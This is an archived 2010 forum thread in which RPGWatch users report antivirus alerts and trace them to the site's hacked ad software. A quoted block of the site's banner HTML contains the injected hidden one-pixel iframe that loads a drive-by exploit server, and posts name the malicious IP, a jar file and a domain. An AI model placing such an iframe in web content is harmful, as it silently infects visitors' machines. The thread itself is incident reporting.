RPGWatch Forums
Page 1 of 2 1 2

RPGWatch Forums (http://www.rpgwatch.com/forums/index.php)
-   RPGWatch (http://www.rpgwatch.com/forums/forumdisplay.php?f=2)
-   -   Virus on the main page? (http://www.rpgwatch.com/forums/showthread.php?t=10935)

DPB July 10th, 2010 15:36

Virus on the main page?
 
The forums don't seem to be affected, but when I try access the main page avast gives me 'A Virus Was Found!' warning and obviously I click abort connection to prevent it loading. Is this just a false positive?

The warning shows:

Filename: http://www.rpgwatch.com/\{gzip}
Malware name: HTML:Iframe-inf
Malware type: Virus/Worm
VPS version: 100710-1, 10/07/2010

GothicGothicness July 10th, 2010 16:10

I also get this warning but it appears to come from another place:

194.8.250.211/tds/in.cgi?default

194.8.250.211 site info

194.8.250.211 IP:
194.8.250.211

194.8.250.211 server location:
Paraguay

194.8.250.211 ISP:
Donstroy Ltd.

Looks kind of fishy ?

July 10th, 2010 16:31

I got a prompt to install some plugin to view additional content. Adblock sees it as a frame, i got alerted by my firewall first for Java attempting a connection. I blocked it and didn't get infected with anything, it seems.

Also blocked the frame with Adblock and it's quiet now.

Cm July 10th, 2010 16:34

I certainly can't swear that it is a false positive, but I have been here from day one and never heard of any virus issues on the site. I have seen people say they got false positives over the years.
I know management will respond when they see your question. This is his middle of the night so check back in about 6 to 8 hours.

July 10th, 2010 16:37

Could be a false positive, but just recently there were similar issues on the Titan Quest forums; somebody/something had injected the main page code with links to plugins or some other type of infected content. I'm not familiar with the technical details, but it wasn't the site owners doing in any case.

Kostas July 10th, 2010 16:43

Windows Defender found something,definitely has to do something with Java.

hishadow July 10th, 2010 17:10

There's an iframe in the banner.

It's the ads delivery that contains the virus.
http://www.rpgwatch.com/Scripts/open…s.php?zoneid=1

Quote:

<div class="header">
<a href="/" style="float:left; outline:none; background:none"><img src="/Skins/Default/Images/invis.png" width="170" height="100" /></a>
<div class="banner-top">
<a href='http://www.rpgwatch.com/Scripts/openx/www/delivery/ck.php?oaparams=2__bannerid=2__zoneid=1__cb=34dcb7 bbc7__oadest=http%3A%2F%2Fwww.gog.com%2Fen%2Ffront page%2Fpp%2Ff6e1126cedebf23e1463aee73f9df087836404 00' target='_blank'><img src='http://www.rpgwatch.com/Scripts/openx/www/images/4d2ed333f245d7c9b96d1d8aee3627a8.jpg' width='468' height='60' alt='Register at GOG through us' title='Register at GOG through us' border='0' /></a><div id='beacon_34dcb7bbc7' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http://www.rpgwatch.com/Scripts/openx/www/delivery/lg.php?bannerid=2&amp;campaignid=1&amp;zoneid=1&am p;loc=http%3A%2F%2Fwww.rpgwatch.com%2F&amp;referer =http%3A%2F%2Fwww.rpgwatch.com%2Fforums%2Fshowthre ad.php%3Fp%3D1061017633&amp;cb=34dcb7bbc7' width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div><iframe src="http://194.8.250.211/tds/in.cgi?default" width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no"></iframe> </div>
</div>

Remus July 10th, 2010 17:22

Quote:

Originally Posted by deimos (Post 1061017629)
I got a prompt to install some plugin to view additional content. Adblock sees it as a frame, i got alerted by my firewall first for Java attempting a connection. I blocked it and didn't get infected with anything, it seems.

Also blocked the frame with Adblock and it's quiet now.

I seen the prompt to install missing plug-in as well. I didn't click it but closed it; Microsoft Security Essential didn't alert me of possible virus.

figment July 10th, 2010 18:29

Got the same problem. The owner of the site is Donstroy which apparently owns several .RU websites which makes me concerned. I tried to manually download the \\194.8.250.216\public\veyron.jar file it was trying to access our of curiosity but cannot seem to which is probably for the best. Could be an ad for Bugatti Veyron but I really doubt it.

I suspect they are trying to exploit a security vulnerability on some versions of the java deployment toolkit. So I would recommend updating or disabling that addin in whatever browser you use.

Edit: Link to all the nasty stuff detected from that domain

cal1s July 10th, 2010 18:59

I tried to email the webmaster of rpgwatch but had no success. info@rpgwatch.com or webmaster@rpgwatch.com didn work.

you should consider trying to install those email accounts for such cases.

but glad others have reported …

aries100 July 10th, 2010 20:15

I got the 'reported as unsafe website' when I clicked the mentioned link. I promptly then closed internet explorer. I hope I haven't gotten anything nasty, though…

Arhu July 11th, 2010 10:09

Myrthos is still asleep I guess, and I'm unfortunately not at home at the moment. I'll check what I can when I'm back.

metamorphium July 11th, 2010 12:46

It's definitely fishy. My Esset NOD32 identified it as Java/Exploit.Agent.NAC Troyan Horse coming from http://woonv[dot]in

Alrik Fassbauer July 11th, 2010 13:25

Firefox 2.x says it wants another plugin to be installed - and that is an "Adobe Reader Plugin" it wants.

This is - by the way - a quite new kind of "drive-by infection" that has become increasingly and alarmingly common.

I think you might switch off the ads altogether and then look what's happening.

I have seen the exactly same advertisement banner both on a game-related web site and on a Poboards-based forum a few months ago, which BOTH triggered the same NOD32 alarm …

So I'm sure this new kind of infection hides within advertisement banners.

Gokyabgu July 11th, 2010 15:56

I've got the same problem five hours ago. My Nod32 antivirus program gave me a virus threat error. It seems to be fine now.

Arhu July 11th, 2010 18:13

I disabled the ads until Myrthos can figure out where, why and how this happened. Thanks for the reports everyone and sorry for the delay. Can't offer any further info yet.

aries100 July 11th, 2010 19:33

Thank you, Arhu, for disabling the ads. I did apparently catch something. However, after a few restarts and a return to the defaults settings for Internet Explorer as well as removing all passwords etc. it seems fine now.

Incidentally, Gameboomers and the Mystery Manor Site have also been the target for attacks by hackers, it seems.

Kostas July 11th, 2010 21:21

Both Firefox and Chrome now block the site,hope Myrthos can sort it out quickly.

metamorphium July 11th, 2010 22:27

Also don't forget to submit for reevaluation. Mere removing of malicious code is not enough.

Myrthos July 12th, 2010 00:26

Apparently our ads software was hacked. There are some messages on the net that even the latest version of our ads software might not be safe so for the time being we'll just have to live without ads until all the issues are fixed.

In the meantime I've requested to be removed from the malware list, which is helpfull for those using Firefox or Chrome.

Sorry about this.


All times are GMT +2. The time now is 03:23.
Page 1 of 2 1 2

Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2014, vBulletin Solutions, Inc.
Copyright by RPGWatch